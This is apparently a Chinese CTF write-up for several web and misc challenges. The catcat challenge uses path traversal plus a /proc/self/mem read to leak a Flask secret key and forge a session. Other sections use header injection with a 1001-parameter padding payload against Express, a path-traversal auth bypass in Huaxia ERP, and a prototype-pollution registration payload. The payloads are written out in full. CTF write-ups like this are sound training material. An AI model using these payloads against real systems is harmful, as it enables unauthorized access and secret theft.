The cat did it
我看着猫好大应该是0%
Misc
Nepnep 祝你新年快乐啦!
视频最后一帧就是flag
web
catcat
测试发现file参数存在任意文件读取。
然后可以得到app.py源码
import os import uuid from flask import Flask, request, session, render_template, Markup from cat import cat flag = "" app = Flask( __name__, static_url_path=\'/\', static_folder=\'static\' ) app.config[\'SECRET_KEY\'] = str(uuid.uuid4()).replace("-", "") + "*abcdefgh" if os.path.isfile("/flag"): flag = cat("/flag") os.remove("/flag") @app.route(\'/\', methods=[\'GET\']) def index(): detailtxt = os.listdir(\'./details/\') cats_list = [] for i in detailtxt: cats_list.append(i[:i.index(\'.\')]) return render_template("index.html", cats_list=cats_list, cat=cat) @app.route(\'/info\', methods=["GET", \'POST\']) def info(): filename = "./details/" + request.args.get(\'file\', "") start = request.args.get(\'start\', "0") end = request.args.get(\'end\', "0") name = request.args.get(\'file\', "")[:request.args.get(\'file\', "").index(\'.\')] return render_template("detail.html", catname=name, info=cat(filename, start, end)) @app.route(\'/admin\', methods=["GET"]) def admin_can_list_root(): if session.get(\'admin\') == 1: return flag else: session[\'admin\'] = 0 return "NoNoNo" if __name__ == \'__main__\': app.run(host=\'0.0.0.0\', debug=False, port=5637)
在flask启动时候已经将flag读取到了内存并且删除源文件了
分析可以得到session中admin==1时候可以得到
但是SECRET_KEY是随机生成的。通过源代码发现读取文件时候可以传入读取开始位置和结束位置,
直接读取内存即可
先读取/proc/self/maps得到(只粘贴关键部分代码)
5610fb071000-5610fb072000 ---p 00000000 00:00 0 [heap] 5610fb072000-5610fb076000 rw-p 00000000 00:00 0 [heap] 7fbc97ae8000-7fbc97b28000 rw-p 00000000 00:00 0 7fbc97d2e000-7fbc97d30000 ---p 00000000 00:00 0 7fbc97d30000-7fbc97e31000 rw-p 00000000 00:00 0
然后通过得到映射关系分别传参start和end读取/proc/self/mem即可得到对应地址的内存
http://223.112.5.156:62400/info?file=../../../../../../../proc/self/mem&start=140447975374848&end=140447975636992
得到内存后刚开始直接搜flag发现没搜到想要的,然后又根据SECRET_KEY和源码搜索*abcdefgh发现了目标
27a6306e0d754319ab297242e2f1dacd*abcdefgh
然后伪造一个session访问就可以得到flag了。
ez_curl
下载附件得到
const express = require('express'); const app = express(); const port = 3000; const flag = process.env.flag; app.get('/flag', (req, res) => { if(!req.query.admin.includes('false') && req.headers.admin.includes('true')){ res.send(flag); }else{ res.send('try hard'); } }); app.listen({ port: port , host: '0.0.0.0'});
只要get参数admin不为false
请求头参数admin为true即可
环境打开得到源代码
<?php highlight_file(__FILE__); $url = 'http://back-end:3000/flag?'; $input = file_get_contents('php://input'); $headers = (array)json_decode($input)->headers; for($i = 0; $i < count($headers); $i++){ $offset = stripos($headers[$i], ':'); $key = substr($headers[$i], 0, $offset); $value = substr($headers[$i], $offset + 1); if(stripos($key, 'admin') > -1 && stripos($value, 'true') > -1){ die('try hard'); } } $params = (array)json_decode($input)->params; $url .= http_build_query($params); $url .= '&admin=false'; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); curl_setopt($ch, CURLOPT_TIMEOUT_MS, 5000); curl_setopt($ch, CURLOPT_NOBODY, FALSE); $result = curl_exec($ch); curl_close($ch); echo $result;
首先php对headers参数进行了检查
其次在get参数后面拼接了&admin=false
绕过这两个就可以
第一个绕过根据检查方法可以构造一个
xx: xx\nadmin: true
就可以绕过第一个检查了
然后第二个参数绕过
通过express的源代码可以发现对参数的最大值进行了限定
parameterLimit: 1000, ... var limit = options.parameterLimit === Infinity ? undefined : options.parameterLimit; var parts = cleanStr.split(options.delimiter, limit);
超过1000个参数会丢弃掉后面的参数
所有只要填充1000个参数就可以让&admin=false被丢弃
payload
{"headers": ["xx: xx\nadmin: true","Content-Type: application/x-www-form-urlencoded"], "params": {"admin": "true", "b0": 0, "b1": 1, "b2": 2, "b3": 3, "b4": 4, "b5": 5, "b6": 6, "b7": 7, "b8": 8, "b9": 9, "b10": 10, "b11": 11, "b12": 12, "b13": 13, "b14": 14, "b15": 15, "b16": 16, "b17": 17, "b18": 18, "b19": 19, "b20": 20, "b21": 21, "b22": 22, "b23": 23, "b24": 24, "b25": 25, "b26": 26, "b27": 27, "b28": 28, "b29": 29, "b30": 30, "b31": 31, "b32": 32, "b33": 33, "b34": 34, "b35": 35, "b36": 36, "b37": 37, "b38": 38, "b39": 39, "b40": 40, "b41": 41, "b42": 42, "b43": 43, "b44": 44, "b45": 45, "b46": 46, "b47": 47, "b48": 48, "b49": 49, "b50": 50, "b51": 51, "b52": 52, "b53": 53, "b54": 54, "b55": 55, "b56": 56, "b57": 57, "b58": 58, "b59": 59, "b60": 60, "b61": 61, "b62": 62, "b63": 63, "b64": 64, "b65": 65, "b66": 66, "b67": 67, "b68": 68, "b69": 69, "b70": 70, "b71": 71, "b72": 72, "b73": 73, "b74": 74, "b75": 75, "b76": 76, "b77": 77, "b78": 78, "b79": 79, "b80": 80, "b81": 81, "b82": 82, "b83": 83, "b84": 84, "b85": 85, "b86": 86, "b87": 87, "b88": 88, "b89": 89, "b90": 90, "b91": 91, "b92": 92, "b93": 93, "b94": 94, "b95": 95, "b96": 96, "b97": 97, "b98": 98, "b99": 99, "b100": 100, "b101": 101, "b102": 102, "b103": 103, "b104": 104, "b105": 105, "b106": 106, "b107": 107, "b108": 108, "b109": 109, "b110": 110, "b111": 111, "b112": 112, "b113": 113, "b114": 114, "b115": 115, "b116": 116, "b117": 117, "b118": 118, "b119": 119, "b120": 120, "b121": 121, "b122": 122, "b123": 123, "b124": 124, "b125": 125, "b126": 126, "b127": 127, "b128": 128, "b129": 129, "b130": 130, "b131": 131, "b132": 132, "b133": 133, "b134": 134, "b135": 135, "b136": 136, "b137": 137, "b138": 138, "b139": 139, "b140": 140, "b141": 141, "b142": 142, "b143": 143, "b144": 144, "b145": 145, "b146": 146, "b147": 147, "b148": 148, "b149": 149, "b150": 150, "b151": 151, "b152": 152, "b153": 153, "b154": 154, "b155": 155, "b156": 156, "b157": 157, "b158": 158, "b159": 159, "b160": 160, "b161": 161, "b162": 162, "b163": 163, "b164": 164, "b165": 165, "b166": 166, "b167": 167, "b168": 168, "b169": 169, "b170": 170, "b171": 171, "b172": 172, "b173": 173, "b174": 174, "b175": 175, "b176": 176, "b177": 177, "b178": 178, "b179": 179, "b180": 180, "b181": 181, "b182": 182, "b183": 183, "b184": 184, "b185": 185, "b186": 186, "b187": 187, "b188": 188, "b189": 189, "b190": 190, "b191": 191, "b192": 192, "b193": 193, "b194": 194, "b195": 195, "b196": 196, "b197": 197, "b198": 198, "b199": 199, "b200": 200, "b201": 201, "b202": 202, "b203": 203, "b204": 204, "b205": 205, "b206": 206, "b207": 207, "b208": 208, "b209": 209, "b210": 210, "b211": 211, "b212": 212, "b213": 213, "b214": 214, "b215": 215, "b216": 216, "b217": 217, "b218": 218, "b219": 219, "b220": 220, "b221": 221, "b222": 222, "b223": 223, "b224": 224, "b225": 225, "b226": 226, "b227": 227, "b228": 228, "b229": 229, "b230": 230, "b231": 231, "b232": 232, "b233": 233, "b234": 234, "b235": 235, "b236": 236, "b237": 237, "b238": 238, "b239": 239, "b240": 240, "b241": 241, "b242": 242, "b243": 243, "b244": 244, "b245": 245, "b246": 246, "b247": 247, "b248": 248, "b249": 249, "b250": 250, "b251": 251, "b252": 252, "b253": 253, "b254": 254, "b255": 255, "b256": 256, "b257": 257, "b258": 258, "b259": 259, "b260": 260, "b261": 261, "b262": 262, "b263": 263, "b264": 264, "b265": 265, "b266": 266, "b267": 267, "b268": 268, "b269": 269, "b270": 270, "b271": 271, "b272": 272, "b273": 273, "b274": 274, "b275": 275, "b276": 276, "b277": 277, "b278": 278, "b279": 279, "b280": 280, "b281": 281, "b282": 282, "b283": 283, "b284": 284, "b285": 285, "b286": 286, "b287": 287, "b288": 288, "b289": 289, "b290": 290, "b291": 291, "b292": 292, "b293": 293, "b294": 294, "b295": 295, "b296": 296, "b297": 297, "b298": 298, "b299": 299, "b300": 300, "b301": 301, "b302": 302, "b303": 303, "b304": 304, "b305": 305, "b306": 306, "b307": 307, "b308": 308, "b309": 309, "b310": 310, "b311": 311, "b312": 312, "b313": 313, "b314": 314, "b315": 315, "b316": 316, "b317": 317, "b318": 318, "b319": 319, "b320": 320, "b321": 321, "b322": 322, "b323": 323, "b324": 324, "b325": 325, "b326": 326, "b327": 327, "b328": 328, "b329": 329, "b330": 330, "b331": 331, "b332": 332, "b333": 333, "b334": 334, "b335": 335, "b336": 336, "b337": 337, "b338": 338, "b339": 339, "b340": 340, "b341": 341, "b342": 342, "b343": 343, "b344": 344, "b345": 345, "b346": 346, "b347": 347, "b348": 348, "b349": 349, "b350": 350, "b351": 351, "b352": 352, "b353": 353, "b354": 354, "b355": 355, "b356": 356, "b357": 357, "b358": 358, "b359": 359, "b360": 360, "b361": 361, "b362": 362, "b363": 363, "b364": 364, "b365": 365, "b366": 366, "b367": 367, "b368": 368, "b369": 369, "b370": 370, "b371": 371, "b372": 372, "b373": 373, "b374": 374, "b375": 375, "b376": 376, "b377": 377, "b378": 378, "b379": 379, "b380": 380, "b381": 381, "b382": 382, "b383": 383, "b384": 384, "b385": 385, "b386": 386, "b387": 387, "b388": 388, "b389": 389, "b390": 390, "b391": 391, "b392": 392, "b393": 393, "b394": 394, "b395": 395, "b396": 396, "b397": 397, "b398": 398, "b399": 399, "b400": 400, "b401": 401, "b402": 402, "b403": 403, "b404": 404, "b405": 405, "b406": 406, "b407": 407, "b408": 408, "b409": 409, "b410": 410, "b411": 411, "b412": 412, "b413": 413, "b414": 414, "b415": 415, "b416": 416, "b417": 417, "b418": 418, "b419": 419, "b420": 420, "b421": 421, "b422": 422, "b423": 423, "b424": 424, "b425": 425, "b426": 426, "b427": 427, "b428": 428, "b429": 429, "b430": 430, "b431": 431, "b432": 432, "b433": 433, "b434": 434, "b435": 435, "b436": 436, "b437": 437, "b438": 438, "b439": 439, "b440": 440, "b441": 441, "b442": 442, "b443": 443, "b444": 444, "b445": 445, "b446": 446, "b447": 447, "b448": 448, "b449": 449, "b450": 450, "b451": 451, "b452": 452, "b453": 453, "b454": 454, "b455": 455, "b456": 456, "b457": 457, "b458": 458, "b459": 459, "b460": 460, "b461": 461, "b462": 462, "b463": 463, "b464": 464, "b465": 465, "b466": 466, "b467": 467, "b468": 468, "b469": 469, "b470": 470, "b471": 471, "b472": 472, "b473": 473, "b474": 474, "b475": 475, "b476": 476, "b477": 477, "b478": 478, "b479": 479, "b480": 480, "b481": 481, "b482": 482, "b483": 483, "b484": 484, "b485": 485, "b486": 486, "b487": 487, "b488": 488, "b489": 489, "b490": 490, "b491": 491, "b492": 492, "b493": 493, "b494": 494, "b495": 495, "b496": 496, "b497": 497, "b498": 498, "b499": 499, "b500": 500, "b501": 501, "b502": 502, "b503": 503, "b504": 504, "b505": 505, "b506": 506, "b507": 507, "b508": 508, "b509": 509, "b510": 510, "b511": 511, "b512": 512, "b513": 513, "b514": 514, "b515": 515, "b516": 516, "b517": 517, "b518": 518, "b519": 519, "b520": 520, "b521": 521, "b522": 522, "b523": 523, "b524": 524, "b525": 525, "b526": 526, "b527": 527, "b528": 528, "b529": 529, "b530": 530, "b531": 531, "b532": 532, "b533": 533, "b534": 534, "b535": 535, "b536": 536, "b537": 537, "b538": 538, "b539": 539, "b540": 540, "b541": 541, "b542": 542, "b543": 543, "b544": 544, "b545": 545, "b546": 546, "b547": 547, "b548": 548, "b549": 549, "b550": 550, "b551": 551, "b552": 552, "b553": 553, "b554": 554, "b555": 555, "b556": 556, "b557": 557, "b558": 558, "b559": 559, "b560": 560, "b561": 561, "b562": 562, "b563": 563, "b564": 564, "b565": 565, "b566": 566, "b567": 567, "b568": 568, "b569": 569, "b570": 570, "b571": 571, "b572": 572, "b573": 573, "b574": 574, "b575": 575, "b576": 576, "b577": 577, "b578": 578, "b579": 579, "b580": 580, "b581": 581, "b582": 582, "b583": 583, "b584": 584, "b585": 585, "b586": 586, "b587": 587, "b588": 588, "b589": 589, "b590": 590, "b591": 591, "b592": 592, "b593": 593, "b594": 594, "b595": 595, "b596": 596, "b597": 597, "b598": 598, "b599": 599, "b600": 600, "b601": 601, "b602": 602, "b603": 603, "b604": 604, "b605": 605, "b606": 606, "b607": 607, "b608": 608, "b609": 609, "b610": 610, "b611": 611, "b612": 612, "b613": 613, "b614": 614, "b615": 615, "b616": 616, "b617": 617, "b618": 618, "b619": 619, "b620": 620, "b621": 621, "b622": 622, "b623": 623, "b624": 624, "b625": 625, "b626": 626, "b627": 627, "b628": 628, "b629": 629, "b630": 630, "b631": 631, "b632": 632, "b633": 633, "b634": 634, "b635": 635, "b636": 636, "b637": 637, "b638": 638, "b639": 639, "b640": 640, "b641": 641, "b642": 642, "b643": 643, "b644": 644, "b645": 645, "b646": 646, "b647": 647, "b648": 648, "b649": 649, "b650": 650, "b651": 651, "b652": 652, "b653": 653, "b654": 654, "b655": 655, "b656": 656, "b657": 657, "b658": 658, "b659": 659, "b660": 660, "b661": 661, "b662": 662, "b663": 663, "b664": 664, "b665": 665, "b666": 666, "b667": 667, "b668": 668, "b669": 669, "b670": 670, "b671": 671, "b672": 672, "b673": 673, "b674": 674, "b675": 675, "b676": 676, "b677": 677, "b678": 678, "b679": 679, "b680": 680, "b681": 681, "b682": 682, "b683": 683, "b684": 684, "b685": 685, "b686": 686, "b687": 687, "b688": 688, "b689": 689, "b690": 690, "b691": 691, "b692": 692, "b693": 693, "b694": 694, "b695": 695, "b696": 696, "b697": 697, "b698": 698, "b699": 699, "b700": 700, "b701": 701, "b702": 702, "b703": 703, "b704": 704, "b705": 705, "b706": 706, "b707": 707, "b708": 708, "b709": 709, "b710": 710, "b711": 711, "b712": 712, "b713": 713, "b714": 714, "b715": 715, "b716": 716, "b717": 717, "b718": 718, "b719": 719, "b720": 720, "b721": 721, "b722": 722, "b723": 723, "b724": 724, "b725": 725, "b726": 726, "b727": 727, "b728": 728, "b729": 729, "b730": 730, "b731": 731, "b732": 732, "b733": 733, "b734": 734, "b735": 735, "b736": 736, "b737": 737, "b738": 738, "b739": 739, "b740": 740, "b741": 741, "b742": 742, "b743": 743, "b744": 744, "b745": 745, "b746": 746, "b747": 747, "b748": 748, "b749": 749, "b750": 750, "b751": 751, "b752": 752, "b753": 753, "b754": 754, "b755": 755, "b756": 756, "b757": 757, "b758": 758, "b759": 759, "b760": 760, "b761": 761, "b762": 762, "b763": 763, "b764": 764, "b765": 765, "b766": 766, "b767": 767, "b768": 768, "b769": 769, "b770": 770, "b771": 771, "b772": 772, "b773": 773, "b774": 774, "b775": 775, "b776": 776, "b777": 777, "b778": 778, "b779": 779, "b780": 780, "b781": 781, "b782": 782, "b783": 783, "b784": 784, "b785": 785, "b786": 786, "b787": 787, "b788": 788, "b789": 789, "b790": 790, "b791": 791, "b792": 792, "b793": 793, "b794": 794, "b795": 795, "b796": 796, "b797": 797, "b798": 798, "b799": 799, "b800": 800, "b801": 801, "b802": 802, "b803": 803, "b804": 804, "b805": 805, "b806": 806, "b807": 807, "b808": 808, "b809": 809, "b810": 810, "b811": 811, "b812": 812, "b813": 813, "b814": 814, "b815": 815, "b816": 816, "b817": 817, "b818": 818, "b819": 819, "b820": 820, "b821": 821, "b822": 822, "b823": 823, "b824": 824, "b825": 825, "b826": 826, "b827": 827, "b828": 828, "b829": 829, "b830": 830, "b831": 831, "b832": 832, "b833": 833, "b834": 834, "b835": 835, "b836": 836, "b837": 837, "b838": 838, "b839": 839, "b840": 840, "b841": 841, "b842": 842, "b843": 843, "b844": 844, "b845": 845, "b846": 846, "b847": 847, "b848": 848, "b849": 849, "b850": 850, "b851": 851, "b852": 852, "b853": 853, "b854": 854, "b855": 855, "b856": 856, "b857": 857, "b858": 858, "b859": 859, "b860": 860, "b861": 861, "b862": 862, "b863": 863, "b864": 864, "b865": 865, "b866": 866, "b867": 867, "b868": 868, "b869": 869, "b870": 870, "b871": 871, "b872": 872, "b873": 873, "b874": 874, "b875": 875, "b876": 876, "b877": 877, "b878": 878, "b879": 879, "b880": 880, "b881": 881, "b882": 882, "b883": 883, "b884": 884, "b885": 885, "b886": 886, "b887": 887, "b888": 888, "b889": 889, "b890": 890, "b891": 891, "b892": 892, "b893": 893, "b894": 894, "b895": 895, "b896": 896, "b897": 897, "b898": 898, "b899": 899, "b900": 900, "b901": 901, "b902": 902, "b903": 903, "b904": 904, "b905": 905, "b906": 906, "b907": 907, "b908": 908, "b909": 909, "b910": 910, "b911": 911, "b912": 912, "b913": 913, "b914": 914, "b915": 915, "b916": 916, "b917": 917, "b918": 918, "b919": 919, "b920": 920, "b921": 921, "b922": 922, "b923": 923, "b924": 924, "b925": 925, "b926": 926, "b927": 927, "b928": 928, "b929": 929, "b930": 930, "b931": 931, "b932": 932, "b933": 933, "b934": 934, "b935": 935, "b936": 936, "b937": 937, "b938": 938, "b939": 939, "b940": 940, "b941": 941, "b942": 942, "b943": 943, "b944": 944, "b945": 945, "b946": 946, "b947": 947, "b948": 948, "b949": 949, "b950": 950, "b951": 951, "b952": 952, "b953": 953, "b954": 954, "b955": 955, "b956": 956, "b957": 957, "b958": 958, "b959": 959, "b960": 960, "b961": 961, "b962": 962, "b963": 963, "b964": 964, "b965": 965, "b966": 966, "b967": 967, "b968": 968, "b969": 969, "b970": 970, "b971": 971, "b972": 972, "b973": 973, "b974": 974, "b975": 975, "b976": 976, "b977": 977, "b978": 978, "b979": 979, "b980": 980, "b981": 981, "b982": 982, "b983": 983, "b984": 984, "b985": 985, "b986": 986, "b987": 987, "b988": 988, "b989": 989, "b990": 990, "b991": 991, "b992": 992, "b993": 993, "b994": 994, "b995": 995, "b996": 996, "b997": 997, "b998": 998, "b999": 999, "b1000": 1000, "b1001": 1001}}
ezbypass
通过查看js文件发现了系统为华夏erp
百度搜索漏洞,发现存在未授权访问
直接构造访问flag.html得到flag
GET /a.css/../flag.html HTTP/1.1 Host: 223.112.5.156:58581 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,ko;q=0.8 Cookie: connect.sid=s%3AN5yR8LFOEHw78WyN-jwIRrCbp9CcaJg7.UB5m78E35r8KYZJItZ3D83vJY%2F5cZSIHJ8EL7YUI9XI; JSESSIONID=; Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1672486173; Hm_lpvt_1cd9bcbaae133f03a6eb19da6579aaba=1672486463 Connection: close
ez_js
通过读js文件发现执行get_flag()即可
控制台执行get_flag()
提示 flag地址为/g3t_fl4g
访问得到flag
cat-wifi
根据提示:
后端某处验证采用了 Object.assign()
猜测存在原型链污染,然后页面只有登录和注册,
根据注册页面发现可以注册为admin账号,但是要验证码。
猜测admin权限可以通过原型链设置,登录页面测试无效
在注册页面尝试成功
{"username":"12","password":"12",
"__proto__":{
"isAdmin":true
}}
